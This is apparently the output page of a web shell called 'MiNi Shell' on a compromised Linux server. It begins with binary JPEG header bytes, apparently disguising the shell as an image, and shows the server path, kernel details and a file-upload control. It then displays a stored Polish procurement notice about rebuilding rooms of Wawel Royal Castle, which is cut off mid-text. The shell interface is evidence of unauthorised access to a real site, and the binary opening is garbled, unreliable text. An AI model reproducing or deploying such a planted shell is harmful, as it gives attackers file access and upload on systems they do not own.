JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210625/0009598201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00095982 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ,,Dwuetapowa przebudowa pomieszczeń Zamku Królewskiego na Wawelu dla potrzeb wystawy stałej Skarbca Koronnego wraz z wykonaniem instalacji’’. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAMEK KRÓLEWSKI NA WAWELU - PAŃSTWOWE ZBIORY SZTUKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276009</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wawel 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-001</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@wawelzamek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wawel.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Dwuetapowa przebudowa pomieszczeń Zamku Królewskiego na Wawelu dla potrzeb wystawy stałej Skarbca Koronnego wraz z wykonaniem instalacji’’. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a6938e42-d575-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00095982</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008701/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Modernizacja przestrzeni Zamku Królewskiego na Wawelu na potrzeby nowej ekspozycji Skarbca Koronnego Rzeczypospolitej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zamekkrolewskinawawelu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> ŚRODKI MAJĄCE NA CELU OCHRONĘ POUFNEGO CHARAKTERU INFORMACJI ORAZ SPOSÓB UZYSKANIA TYCH INFORMACJI.<br/>1.	Zamawiający nakłada na Wykonawców wymogi mające na celu ochronę poufnego charakteru informacji, udostępnianych w toku postępowania o udzielenie zamówienia. <br/>2.	Klauzulą poufności w niniejszym postępowaniu o udzielenie zamówienia publicznego została objęta część SWZ zawierająca następujący dokument: Projekt Techniczny Tom 4D- Instalacje bezpieczeństwa i ochrony mienia.<br/>3.	W celu uzyskania dostępu do ww. dokumentu Wykonawcy zobligowani są do złożenia oświadczenia o zachowaniu poufności (wzór oświadczenia stanowi załącznik nr 11 do SWZ.)Oświadczenie, o którym mowa w ust. 3 należy złożyć w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym poprzez Portal.<br/>4.	Oświadczenie, o którym mowa w ust. 3 musi być podpisane przez uprawnionego przedstawiciela Wykonawcy. <br/>5.	W przypadku podpisywania oświadczenia przez osobę nieuprawnioną zgodnie z zapisami w dokumentach rejestrowych do oświadczenia należy dołączyć pełnomocnictwo. Pełnomocnictwo musi być złożone, z wymogami określonymi w rozdziale XIX ust. 10 SWZ. <br/>6.	Po złożeniu oświadczenia, według zasad określonych w niniejszym rozdziale, Zamawiający przekaże za pośrednictwem Portalu część SWZ, o którym mowa w ust. 2. <br/>7.	W przypadku zaistnienia konieczności udzielania wyjaśnień/zmian części SWZ (dokumentów), którym nadano klauzulę poufności, będą one przekazywane wg zasad określonych w ust. 6, Wykonawcom którzy złożyli oświadczenie o zachowaniu poufności, o którym mowa w niniejszym rozdziale. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/zamekkrolewskinawawelu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Środkiem komunikacji elektronicznej, służącym złożeniu oferty oraz wszelkich oświadczeń przez Wykonawcę, jest Portal SmartPZP dostępny pod adresem https://portal.smartpzp.pl/zamekkrolewskinawawelu<br/>Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej, w tym informacje dotyczące wymogów użycia podpisu elektronicznego zostały szczegółowo opisane w paragrafach XVI, XVIII, XIX i XXII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Zamek Królewski na Wawelu - Państwowe Zbiory Sztuki, Wawel 5, 31 - 001 Kraków, www.wawel.krakow.pl;zamek@wawelzamek.pl; telefon nr 12 422 51 55; fax: (12) 421 51 77;<br/>•	kontakt z inspektorem danych osobowych: iod@wawel.org.pl;<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr sprawy:DZZP-282-10/21 prowadzonym w trybie podstawowym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art. 291 ust. 1 zdanie drugie ustawy z dnia11września 2019r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019) dalej „ustawa Pzp”; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Do przetwarzania danych osobowych osób fizycznych w tym okresie Zamawiający stosuje przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (DZ.U. z 2018 r. poz. 1000) oraz rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZZP-282-10/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 4187749,53 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie robót budowlano-konserwatorskich wraz z instalacjami elektrycznymi (z wyłączeniem osprzętu dla oświetlenia ekspozycyjnego) i systemami bezpieczeństwa w Zamku Królewskim na Wawelu obejmujących:<br/>a)	przebudowę części kondygnacji parteru i piwnic skrzydeł północnego oraz wschodniego Zamku w zakresie dostosowania obiektu dla potrzeb nowej ekspozycji stałej oraz wykonanie prac modernizacyjnych i wykonaniu instalacji elektrycznej oświetlenia podstawowego, awaryjnego, ewakuacyjnego, systemów bezpieczeństwa SSWiN, SKD, TVD, BSOE, sieci teletechnicznej, urządzeń bezprzewodowego systemu pomiaru klimatu, systemu SAP, światłowodu wewnątrz budynkowego, instalacji SSP, instalacji teletechnicznych, z zachowaniem ciągłości działania dla całego Zamku,<br/>b)	podłączenie i zintegrowanie instalacji systemów bezpieczeństwa i elektrycznej Skarbca z całym Zamkiem,<br/>c)	prace konserwatorskie,<br/>d)	przebudowę pomieszczeń 042-059 parteru w skrzydle północnym (pomieszczenia po Archiwum Narodowym),<br/>e)	w nowo projektowanych gablotach oraz istniejących podłączenie i zintegrowanie instalacji systemów bezpieczeństwa i elektrycznej w gablotach wystawowych w nowej oraz starej części Skarbca Koronnego,<br/>f)	w pomieszczeniach starej części Skarbca i Zbrojowni;<br/>- demontaż i utylizację istniejących gablot w salach (030 Sala Jadwigi i Jagiełły, 038 Sala z płaszczem, 041 Sala z rzędami), <br/>- zabezpieczenie istniejących gablot (do pozostawienia) w salach (020 i 023 tzw. Białe sale oraz 039 Sala Kazimierzowska),<br/>- zabezpieczenie istniejącego wyposażenia w salach ( 024 recepcja, 025 sień z bronią drzewcową, 029 sala ze zbrojami, w piwnicy sale nr 0020, 0021, 0033).<br/>2.	Wykonawca zobowiązany jest realizować roboty zgodnie z:<br/>a)	projektem umowy (załącznik nr 5 do SWZ);<br/>b)	Dokumentacją Projektową obejmującą następujące załączniki do OPZ (załącznik nr 2 do SWZ) : <br/>Załącznik nr 1 do OPZ – Pozwolenie Konserwatorskie<br/>Załącznik nr 2 do OPZ – PROJEKT:<br/>Załącznik nr 2a do OPZ –Projekt Architektoniczno-Budowlany,<br/>Załącznik nr 2b do OPZ – Projekt Techniczny (architektura i konstrukcja)<br/>Załącznik nr 2c do OPZ – Projekt Techniczny (instalacje)<br/>Załącznik nr 3 do OPZ – STWIORB<br/>Załącznik nr 3a do OPZ – STWIORB<br/>Załącznik nr 3b do OPZ – instalacje elektryczne bez osprzętu oświetlenia ekspozycyjnego<br/>Załącznik nr 3c do OPZ –instalacje sieci okablowania strukturalnego<br/>Załącznik nr 3d do OPZ – instalacje sygnalizacji pożaru<br/>Załącznik nr 3e do OPZ – instalacje bezpieczeństwa i ochrony mienia<br/>Załącznik nr 3f do OPZ – Automatyka i BMS <br/>Załącznik nr 4 do OPZ – PRZEDMIARY:<br/>Załącznik nr 4a do OPZ –roboty budowlane<br/>Załącznik nr 4b do OPZ – roboty konserwatorskie (finansowane ze SKOZK)<br/>Załącznik nr 4c do OPZ – instalacje elektryczne bez osprzętu oświetlenia ekspozycyjnego, tzn. bez zakupu, dostawy i montażu opraw ekspozycyjnych, szynoprzewodów oraz słupków do opraw ekspozycyjnych<br/>Załącznik nr 4d do OPZ –instalacje sieci okablowania strukturalnego<br/>Załącznik nr 4e do OPZ – instalacje sygnalizacji pożaru<br/>Załącznik nr 4f do OPZ – instalacje bezpieczeństwa i ochrony mienia<br/>Załącznik nr 4g do OPZ – instalacje BSOE<br/>Załącznik nr 4h do OPZ – instalacje SSWN<br/>Załącznik nr 4i do OPZ – Automatyka i BMS<br/>Załącznik nr 5 do OPZ - WYTYCZNE DO HARMONOGRAMU (rzeczowo-terminowo-finansowego)<br/>Załącznik nr 6 do OPZ - SZCZEGÓŁOWE WYTYCZNE INST. ELEKTRYCZNYCH I NISKOPRĄDOWYCH<br/>Załącznik nr 7 do OPZ - WYTYCZNE I WARUNKI ORGANIZACJI I PROWADZENIA PRAC <br/>Załącznik nr 8 do OPZ – WYTYCZNE KONSERWATORSKIE <br/>Pozostałe informacje dotyczące opisu przedmiotu zamówienia znajdują się w dokumentacji SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212354-2 - Roboty budowlane w zakresie zamków</p> <p class="mb-0">45223200-8 - Roboty konstrukcyjne</p> <p class="mb-0">45262510-9 - Roboty kamieniarskie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">329 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ofertom zostaną przyznane punkty wg wzoru: <br/>P= C + G gdzie:<br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”;<br/>G – liczba punktów w kryterium „Gwarancja i rękojmia”;<br/>3.	Ocena ofert w kryterium „Cena” (C). <br/>„Cena” rozumiana jako całkowita wartość oferty brutto, obejmująca kwotę za realizację całego zamówienia.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>C obliczana = (X min : X obliczana ) x 60 <br/>gdzie: <br/>C obliczana - liczba punktów badanej oferty w kryterium „cena”;<br/>X min – najniższa cena pośród złożonych ważnych ofert;<br/>X obliczana – cena badanej oferty.<br/>Maksymalną ilość punktów (60 pkt.) w niniejszym kryterium uzyska Wykonawca który w ofercie wskaże najniższa cenę. <br/>4.	Ocena ofert w kryterium „gwarancja i rękojmia”.<br/>Gwarancja i rękojmia - rozumiana jako zobowiązanie Wykonawcy do zapewnienia odpowiedniej jakości wykonanych robót budowlanych oraz zastosowanych materiałów w trakcie realizacji zamówienia.<br/>Punktacja w tym kryterium zostanie ustalona w następujący sposób:<br/>Jeżeli Wykonawca wskaże w Formularzu Ofertowym, że oferuje: <br/>-	60 miesięcy gwarancji i rękojmi na wykonane roboty budowlane i zastosowane materiały, wówczas jego oferta otrzyma 40 pkt. <br/>-	48 miesięcy gwarancji i rękojmi na wykonane roboty budowlane i zastosowane materiały, wówczas jego oferta otrzyma 20 pkt<br/>-	36 miesięcy gwarancji i rękojmi na wykonane roboty budowlane i zastosowane materiały, wówczas jego oferta otrzyma 0 pkt<br/>Wykonawca winien zaznaczyć jedną z opcji w tym zakresie w formularzu ofertowym. <br/>W przypadku jeśli Wykonawca nie zaznaczy żadnej z opcji, Zamawiający uzna, że Wykonawca oferuje 36miesięczny okres gwarancji na wykonane roboty oraz użyte materiały i nie przyzna dodatkowym punktów w tym kryterium. Maksymalną ilość punktów (40 pkt.) w niniejszym kryterium uzyska oferta, w której Wykonawca wskaże, że zaoferuje co najmniej 60 miesięczny okres gwarancji na wykonane roboty oraz użyte materiały.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej.<br/>2.	W celu spełniania warunku, o którym mowa w ust. 1 Wykonawca musi wykazać, że:<br/>1)	wykonał w okresie ostatnich siedmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, w sposób należyty co najmniej 2 (dwie) roboty budowlane polegające na remoncie lub przebudowie lub modernizacji i/lub budowie instalacji w budynku wpisanym do właściwego rejestru obiektów zabytkowych (w rozumieniu przepisów Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz.U. z 2020 r. poz. 282) dalej „OchrZabU”, lub – w przypadku rejestrów prowadzonych poza RP – rejestrów równoważnych, prowadzonych na podstawie przepisów obowiązujących ze względu na miejsce położenia zabytku). Wskazana robota budowlana musi być o wartości co najmniej: 2 000 000,00 zł netto i swoim zakresem obejmować m.in. wykonanie: <br/>- przebudowy pomieszczeń wraz z modernizacją i/lub budową instalacji; <br/>- remontu konserwatorskiego, w tym konserwacji elementów kamiennych, konserwacji tynków, konserwacji stolarki.<br/><br/>UWAGA!: <br/>-	Wartość co najmniej 2 000 000,00 zł netto odnosi się do 1 roboty budowlanej. W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca musi wykazać, że zrealizował co najmniej 2 (dwie)tego typu roboty budowlane, z których każda musi obejmować zakres wskazany przez Zamawiającego w treści warunku udziału. <br/>-	Zamawiający nie dopuszcza możliwości sumowania wartości wykonywanych robót budowlanych w ramach kilku (wielu) umów, w celu uzyskania wartości zamówienia wymaganej dla wykazania spełnienia niniejszego warunku udziału w postępowaniu.<br/>-	W przypadku podmiotów wspólnie ubiegających się o zamówienie (tzw. Konsorcjum) spełnią ten warunek, jeżeli przynajmniej jeden z podmiotów tworzących konsorcjum spełnia samodzielnie warunek niezbędnego doświadczenia sprecyzowany przez Zamawiającego w rozdziale X ust. 2 pkt. 1 tj. zrealizował co najmniej 2 roboty budowlane w zakresie jak określił Zamawiający.<br/>-	W przypadku gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego Banku Polskiego (dalej: NBP)dla danej 